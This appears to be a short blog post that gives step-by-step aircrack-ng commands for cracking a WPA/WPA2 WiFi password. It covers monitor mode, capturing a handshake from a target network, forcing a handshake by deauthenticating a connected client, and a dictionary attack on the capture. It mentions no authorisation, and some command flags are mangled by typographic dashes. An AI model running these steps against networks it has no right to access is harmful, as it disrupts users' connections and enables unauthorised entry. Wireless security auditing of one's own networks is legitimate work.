RSSBrute Forcing WPA WiFi Encryption
Mar 19
Linux General, Networking, Wireless Comments Off
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Stop Network Manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
- Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay –deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 –ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode: airmon-ng stop mon0